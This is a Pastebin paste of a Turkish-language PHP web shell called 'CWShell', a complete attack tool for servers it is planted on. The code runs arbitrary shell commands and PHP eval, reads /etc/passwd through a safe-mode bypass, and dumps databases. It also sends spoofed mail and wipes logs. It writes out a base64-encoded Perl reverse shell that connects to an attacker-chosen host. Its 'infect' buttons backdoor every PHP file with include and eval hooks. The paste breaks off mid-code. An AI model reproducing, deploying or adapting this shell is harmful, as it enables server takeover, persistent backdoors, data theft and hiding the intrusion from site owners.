blackcyberrootshell

[ + ] Cyber Warrior Shell [ + ]

Feb 27th, 2015
295
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 41.18 KB | None | 0 0
  1. <?php
  2.  
  3. # Edited By KingDefacer
  4.  
  5. // Variables
  6.    $info = @$_SERVER['SERVER_SOFTWARE'];
  7.    $page = @$_SERVER['SCRIPT_NAME'];
  8.    $site = getenv("HTTP_HOST");
  9.    $uname = php_uname();
  10.    $smod = ini_get('safe_mode');
  11.            if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
  12.            else { $safemode = "<font color='red'>ACIK</font>";      }
  13.    $dir = @realpath($_POST['dir']);
  14.    $mkdir = @$_POST['makedir'];
  15.    $mydir = @$_POST['deletedir'];
  16.    $cmd = @$_GET['cmd'];
  17.    $host = @$_POST['host'];
  18.    $proto = @$_POST['protocol'];
  19.    $delete = @$_POST['delete'];
  20.    $phpeval = @$_POST['php_eval'];
  21.    $db = @$_POST['db'];
  22.    $query = @$_POST['query'];
  23.    $user = @$_POST['user'];
  24.    $pass = @$_POST['passd'];
  25.    $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  26.    
  27.  
  28.    $quotes = get_magic_quotes_gpc();
  29. if ($quotes == "1" or $quotes == "on")
  30.    {
  31.        $quot = "<font color='red'>ACIK</font>";
  32.    }
  33.    else
  34.    {
  35.        $quot = "<font color='lightgreen'>KAPALI</font>";
  36.    }
  37.    // Perms
  38.     function getperms($fn)
  39. {
  40. $mode=fileperms($fn);
  41. $perms='';
  42. $perms .= ($mode & 00400) ? 'r' : '-';
  43. $perms .= ($mode & 00200) ? 'w' : '-';
  44. $perms .= ($mode & 00100) ? 'x' : '-';
  45. $perms .= ($mode & 00040) ? 'r' : '-';
  46. $perms .= ($mode & 00020) ? 'w' : '-';
  47. $perms .= ($mode & 00010) ? 'x' : '-';
  48. $perms .= ($mode & 00004) ? 'r' : '-';
  49. $perms .= ($mode & 00002) ? 'w' : '-';
  50. $perms .= ($mode & 00001) ? 'x' : '-';
  51. return $perms;
  52. }
  53.  // milw0rm Search (locushell)
  54.  
  55. $Lversion = @php_uname('r');
  56. $OSV = @php_uname('s');
  57. if(eregi('Linux',$OSV))
  58. {
  59. $Lversion=substr($Lversion,0,6);
  60. $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
  61.  
  62. }else{
  63. $Lversion=substr($Lversion,0,3);
  64. $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  65. }
  66. if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
  67.    //Space
  68.    $spacedir = @getcwd();
  69.    $free = @diskfreespace($spacedir);
  70.    
  71. if (!$free) {$free = 0;}
  72.    $all = @disk_total_space($spacedir);
  73. if (!$all) {$all = 0;}
  74. function view_size($size)
  75. {
  76.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  77.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  78.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  79.  else {$size = $size . " B";}
  80.  return $size;
  81. }
  82. $percentfree = intval(($free*100)/$all);
  83.  
  84.  
  85. // PHPinfo
  86. if(isset($_POST['phpinfo']))
  87. {
  88. die(phpinfo());
  89. }
  90.    
  91.  
  92. // Make File
  93.  
  94.    $name = htmlspecialchars(@$_POST['names']);
  95.    $src = @$_POST['source'];
  96.     if(isset($name) && isset($src))
  97.       {
  98.       if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; }
  99.    $ctd = fopen($name,"w+");
  100.    fwrite($ctd, $src);
  101.    fclose($ctd);
  102.    echo "<script>alert('Uploaded')</script>";
  103.       }
  104.  
  105. // Upload File
  106.    $path = @$_FILES['ffile']['tmp_name'];
  107.    $name = @$_FILES['ffile']['name'];
  108.    if(isset($path) && isset($name))
  109. {  
  110. if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; }
  111.    if(move_uploaded_file($path, $name))
  112.    {
  113.       echo "<script>alert('Uploaded')</script>";
  114.    }
  115.    else
  116.    {
  117.       echo "<script>alert('Error')</script>";
  118. }   }
  119.  
  120. // Delete File
  121.  
  122.    
  123.    if(isset($delete) && $delete != $dir)
  124. {
  125.       if(file_exists($delete))
  126.       {
  127.          unlink($delete);
  128.          echo "<script>alert('File Deleted')</script>";
  129.       }
  130.  
  131. }
  132.  
  133. // Database
  134.    
  135.    if(isset($db) && isset($query) && isset($_POST['godb']))
  136. {
  137.    $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
  138.    $db = mysql_select_db($db)or die(mysql_error());
  139.    $queryz = mysql_query($query)or die(mysql_error());
  140. if($query) { echo "<script>alert('Done')</script>"; }
  141. else { echo "<script>alert('Error')</script>"; }
  142. }
  143.  
  144. // Dump Database [pacucci.com]
  145. if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
  146. mysql_connect('localhost', $user, $pass);
  147. mysql_select_db($db);
  148. $tables = mysql_list_tables($db);
  149. while ($td = mysql_fetch_array($tables))
  150. {
  151. $table = $td[0];
  152. $r = mysql_query("SHOW CREATE TABLE `$table`");
  153. if ($r)
  154. {
  155. $insert_sql = "";
  156. $d = mysql_fetch_array($r);
  157. $d[1] .= ";";
  158. $SQL[] = str_replace("\n", "", $d[1]);
  159. $table_query = mysql_query("SELECT * FROM `$table`");
  160. $num_fields = mysql_num_fields($table_query);
  161. while ($fetch_row = mysql_fetch_array($table_query))
  162. {
  163. $insert_sql .= "INSERT INTO $table VALUES(";
  164. for ($n=1;$n<=$num_fields;$n++)
  165. {
  166. $m = $n - 1;
  167. $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
  168. }
  169. $insert_sql = substr($insert_sql,0,-2);
  170. $insert_sql .= ");\n";
  171. }
  172. if ($insert_sql!= "")
  173. {
  174. $SQL[] = $insert_sql;
  175. }
  176. }
  177. }
  178. $dump = "-- Database: ".$_POST['db'] ." \n";
  179. $dump .= "-- CWShellDumper v3\n";
  180. $dump .= "-- Cyber-Warrior.Org\n";
  181. $dumpp = $dump.implode("\r", $SQL);
  182. $name = $db."-".date("d-m-y")."cyberwarrior.sql";
  183. Header("Content-type: application/octet-stream");
  184. Header("Content-Disposition: attachment; filename = $name");
  185. echo $dumpp;
  186. die();
  187. }
  188.  
  189. // Make Dir
  190. if(isset($mkdir)) {
  191.  
  192. mkdir($mkdir);
  193. if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } }
  194.  
  195. // Delete Directory
  196.  
  197. if(isset($mydir) && $mydir != "$dir") {
  198. $d = dir($mydir);
  199. while($entry = $d->read()) {
  200.  if ($entry !== "." && $entry !== "..") {
  201.  unlink($entry);
  202.  }
  203. }
  204. $d->close();
  205. rmdir($mydir);
  206.  
  207. }
  208.  
  209. //Infect Files [RFI]
  210.  
  211. if(isset($_POST['inf3ct']))
  212. {
  213. foreach (glob("*.php") as $lola)
  214. {
  215. $dira = '.';
  216. $asdi = fopen($lola, 'a+');
  217. @fwrite($asdi, '
  218. <?php
  219. include($_GET[\'pwn\']);
  220. ?>');
  221. @fclose($asdi);
  222. }
  223. if($asdi)
  224. {
  225. $textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
  226. }
  227. else {
  228. $textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
  229. }
  230. }
  231.  
  232. //Infect Files [Eval]
  233. if(isset($_POST['evalinfect']))
  234. {
  235. foreach (glob("*.php") as $lal)
  236. {
  237. $dira = '.';
  238. $axd = fopen($lal, 'a+');
  239. @fwrite($axd, '
  240. <?php
  241. eval(stripslashes($_GET[\'eval\']));
  242. ?>');
  243. @fclose($axd);
  244. }
  245. if($axd)
  246. {
  247. $textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
  248. }
  249. else {
  250. $textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
  251. }
  252. }
  253.  
  254. // Images
  255.    if(@$_GET['com'] == "image")
  256.    {
  257.    $images = array(
  258.    "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
  259.    "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
  260.    "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
  261.    );
  262. header("Content-type: image/gif");
  263. header("Cache-control: public");
  264. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  265. header("Cache-control: max-age=".(60*60*24*7));
  266. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  267. $image = $images[$_GET['img']];
  268.  echo  base64_decode($image);
  269.  }
  270. //File List
  271.  
  272.    chdir($dir);
  273.    if(!isset($dir)) { $dir = @realpath("."); }
  274.     if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
  275.    if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
  276.    $pahtw = 0;
  277.    $filew = 0;
  278.    $num = 1;
  279.  
  280.    if (is_dir($dir))
  281.    {
  282.       if ($open = opendir($dir))
  283.       {
  284.       if(is_dir($dir)) {
  285.    $typezz = "DIR";
  286.    $pahtw++;
  287.  }
  288.          while (($list = readdir($open)) == true)
  289.          {
  290.          
  291.          if(is_dir($list)) {
  292.    $typezz = "DIR";
  293.    $pahtw++;
  294.    @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
  295. else {
  296.  
  297.    $lolz = filesize($list) / 1024;
  298.    $lolx = intval($lolz);
  299.    if($lolx == 0) { $lolx = 1; }
  300.    $typezz = "DOSYA";
  301.    $filew++;
  302.    $listz = "/".$list;
  303.    if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  304.    elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  305.    else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
  306.    
  307.    }        
  308.    closedir($open);
  309.          
  310.       }
  311. $fileq = $pahtw + $filew;   }
  312.  
  313.  
  314.  
  315.  
  316. echo "<html>
  317. <head><title>$site ~ CWShéLL - Edited By KingDefacer</title>
  318. <style>
  319. table.menu {
  320. border-width: 0px;
  321.   border-spacing: 1px;
  322.   border-style: solid;
  323.   border-color: #a6a6a6;
  324.   border-collapse: separate;
  325.   background-color: rgb(98, 97,97);
  326. }
  327. table.menuz {
  328. border-width: 0px;
  329.   border-spacing: 1px;
  330.   border-style: solid;
  331.   border-color: #a6a6a6;
  332.   border-collapse: separate;
  333.   background-color: rgb(98, 97,97);
  334. }
  335. table.menu td {
  336.   border-width: 1px;
  337.   padding: 1px;
  338.   border-style: none;
  339.   border-color: #333333;
  340.   background-color: #000000;
  341.   -moz-border-radius: 0px;
  342. }
  343. table.menuz tr {
  344.   border-width: 1px;
  345.   padding: 1px;
  346.   border-style: none;
  347.   border-color: #333333;
  348.   background-color: #000000;
  349.   -moz-border-radius: 0px;
  350. }
  351.  
  352. table.menuz tr:hover {
  353.     background-color: #111111;
  354. }
  355. input,textarea,select {
  356. font: normal 11px Verdana, Arial, Helvetica, sans-serif;
  357. background-color:black;
  358. color:#a6a6a6;
  359. border: solid 1px #363636;
  360. }
  361. </style>
  362. </head>
  363. <body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
  364. <table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
  365. <tr><td>
  366. <center><b><font size='6' face='Webdings'>ü</font>
  367. <font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
  368. <font size='6' face='Webdings'>ü</font></b>
  369. </center>
  370. </td></tr></table><table class=menu width=100%<tr><td>
  371. <font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
  372. <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
  373. <b>Server Bilgisi : </b> <u>$info</u> <br>
  374. <b>Uname -a:</b> <u>$uname</u> <br>
  375. <b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
  376. <b>Safe Mode:</b>  <u>$safemode</u> <br>
  377. <b>Sihirli Sozler:</b> <u>$quot</u> <br>
  378. <b>Sayfa:</b> <u>$page</u><br>
  379. <b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
  380. <b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
  381. <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
  382. <tr><td><form method='post' action=''>
  383. <center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
  384. // Safe Mode Bypass
  385. if(isset($_POST['safemodz']))
  386. {
  387. echo "<tr><td valign=top width=50%>
  388. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
  389. <form action='' method='post'>
  390.      <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>
  391.       </td><tr>
  392. <td valign=top>
  393. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
  394.   <form method='post' action=''>
  395.   <font size='1' face='Verdana'>Klasör:</font><br>
  396.   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
  397.   }
  398.    // Safe Mode Bypass: File
  399. if(isset($_POST['redfi']))
  400. {
  401.     $test='';
  402.     $tempp= tempnam($test, "cx");
  403.     $get = htmlspecialchars($_POST['filew']);
  404.     if(copy("compress.zlib://".$get, $tempp)){
  405.     $fopenzo = fopen($tempp, "r");
  406.     $freadz = fread($fopenzo, filesize($tempp));
  407.     fclose($fopenzo);
  408.     $source = htmlspecialchars($freadz);
  409.     echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
  410.     unlink($tempp);
  411.     } else {
  412.     echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
  413.             }
  414.    
  415. }
  416.  
  417. // Safe Mode Bypass: Directory
  418.  if(isset($_POST['reddi'])){
  419.    
  420. function dirz()
  421. {
  422. $dirz = $_POST['directory'];
  423. $files = glob("$dirz*");
  424.  
  425. foreach ($files as $filename) {
  426.     echo "<tr><td><font size='1' face='Verdana'>";
  427.    echo "$filename\n";
  428.    echo "</font><br>";
  429. }
  430. }
  431. echo "<br>"; dirz();
  432. }
  433.  
  434. // Connect Back
  435. if(isset($_POST['connectback']))
  436. {
  437. echo "
  438. <tr><td>
  439. <center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
  440. <form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>";
  441. }
  442. if(isset($_POST['logeraser']))
  443. {
  444. echo "<tr><td>
  445. <center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
  446.        <select name=functionp>
  447.          <option>linux</option>
  448.          <option>sunos</option>
  449.          <option>aix</option>
  450.          <option>irix</option>
  451.          <option>openbsd</option>
  452.           <option>solaris</option>
  453.           <option>suse</option>
  454.           <option>lampp</option>
  455.           <option>debian</option>
  456.           <option>freebsd</option>
  457.           <option>misc</option>
  458.        </select><br><input type='submit' name='runer' value='Erase'></table>";
  459.         }
  460.        
  461. // Connect Back
  462. if(isset($_POST['connsub']))
  463. {
  464. $sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
  465. $openz = fopen("cbs.pl", "w+")or die("Error");
  466. fwrite($openz, $sources)or die("Error");
  467. fclose($openz);
  468. $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
  469. unlink("cbs.pl");
  470. }
  471. if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
  472.  
  473.         // Logs Eraser
  474. if(isset($_POST['runer']))
  475. {
  476. echo "<tr><td><center><textarea cols='30' rows='2'>";
  477. $erase = base64_decode("");
  478. $openp = fopen("logseraser.pl", "w+")or die("Error");
  479. fwrite($openp, $erase)or die("Error");
  480. fclose($openp);
  481. $aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
  482. unlink("logseraser.pl");
  483. echo "</textarea>";
  484. }
  485.  
  486. if(isset($_POST['commex']))
  487. {
  488. echo "<tr><td>
  489. <center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
  490.        <input name=cmd size=20 type=text>
  491.        <select name=functionz>
  492.          <option>passthru</option>
  493.          <option>popen</option>
  494.          <option>exec</option>
  495.          <option>shell_exec</option>
  496.          <option>system</option>
  497.        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
  498.    }
  499.    if(isset($_POST['cmdex']))
  500.    { echo "<tr><td>";
  501.    switch (@$_POST['functionz']) {
  502.     case "system":
  503.     system(stripslashes($_POST['cmd']));
  504.    
  505.     break;
  506.     case "popen":
  507.     $handle = popen($_POST['cmd'].' 2>&1', 'r');
  508.     echo "'$handle'; " . gettype($handle) . "\n";
  509.     $read = fread($handle, 2096);
  510.     echo $read;
  511.     pclose($handle);
  512.    
  513.     break;
  514.     case "shell_exec":
  515.     shell_exec(stripslashes($_POST['cmd']));
  516.    
  517.  
  518.     break;
  519.     case "exec":
  520.     exec(stripslashes($_POST['cmd']));
  521.    
  522.     break;
  523.     case "passthru":
  524.     passthru(stripslashes($_POST['cmd']));
  525.    
  526.     }
  527.     }
  528.  
  529. elseif(isset($_POST['mail']))
  530. {
  531. echo "<form method='post' action=''>
  532. <td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center>
  533. <center><font face='Verdana' size='1'>Kime:<br>
  534. <input type='text' size='19' name='mto'><br>
  535. Kimden:<br>
  536. <input type='text' size='19' name='mfrom'><br>
  537. Konu:<br>
  538. <input type='text' size='19' name='mobj'><br>
  539. Mesaj:<br>
  540. <textarea name='mtext' cols=20 rows=4></textarea><br>
  541. <br><input type='submit' value='Yolla' name='senm'>
  542. </form></table><br>";}
  543. if(isset($_POST['senm']))
  544. {
  545. //Mail With HTML   <- webcheatsheet.com
  546. $to = $_POST['mto'];
  547. $subject = $_POST['mobj'];
  548. $contentz = $_POST['mtext']."<!--";
  549. $random_hash = md5(date('r', time()));
  550. $headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
  551. $headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
  552. ob_start();
  553. ?>
  554.  
  555. --PHP-alt-<?php echo $random_hash; ?>
  556. Content-Type: text/html; charset="iso-8859-1"
  557. Content-Transfer-Encoding: 7bit
  558.  
  559. <?  echo "$contentz"; ?>
  560. --PHP-alt-<?php echo $random_hash; ?>--
  561. <?
  562. $message = ob_get_clean();
  563.  
  564. $mail = @mail( $to, $subject, $message, $headers );
  565.  
  566. if($mail) { echo "<br><td valign=top>
  567. <center><font color='green' size='1'>Mail Sent</font></center></table>"; }
  568. else { echo "<br><td valign=top>
  569. <center><font color='red' size='1'>Error</font></center></table>"; }
  570. }
  571.  
  572. elseif(isset($_POST['encoder'])) {
  573. //Encoder
  574. echo "<form method='post' action=''><td valign=top>
  575. <center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>";
  576. }
  577. if(isset($_POST['encode'])) { echo "<td valign=top>
  578. <center><font face='Verdana' size='1'>
  579. MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
  580. Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
  581. Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
  582. Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
  583. Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
  584.  
  585. //File List
  586. echo "</table><table width=100%><tr><td>
  587. <center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
  588. <center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
  589. <font size='1'>
  590. <td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
  591. </table></center>";
  592.  
  593. echo "
  594. <br>
  595. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
  596. <center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
  597. if(!isset($phpeval))
  598. {
  599. echo "
  600.   <form method='post' action=''>
  601.   <textarea name=php_eval cols=100 rows=5></textarea><br>
  602.   <input type='submit' value='Calistir!'>
  603.   </form>
  604. ";
  605. }
  606.  
  607. if(isset($phpeval)) {
  608. echo "
  609. <form method='post' action=''>
  610. <textarea name=php_eval cols=100 rows=10>";
  611. $wr = '"';
  612.  $eval = @str_replace("<?","",$phpeval);
  613.  $eval = @str_replace("?>","",$phpeval);
  614.  @eval($eval);
  615. echo "</textarea><br><input type='submit' value='Calistir!'></form>";
  616.  
  617. }
  618. echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
  619. if(isset($textzz)) { echo $textzz; }
  620. if(isset($textz0)) { echo $textz0; }
  621. echo "</center></form></td></tr><tr><td>
  622. <center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
  623. <form method='post' action=''>
  624. <input type='text' name='editfile' value=".$dir.">
  625. <input type='submit' value='Go' name='doedit'>
  626. </form>";
  627. // Edit Files n3xpl0rer
  628. if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
  629. {
  630. $file = $_POST['editfile'];
  631. $content = file_get_contents($file);
  632. echo "<form action='' method='post'><center>
  633. <input type='hidden' name='editfile' value='".$file."'>
  634. <textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
  635. }
  636. if(isset($_POST['edit'])) {
  637. $file = $_POST['editfile'];
  638. echo  $file."<br />";
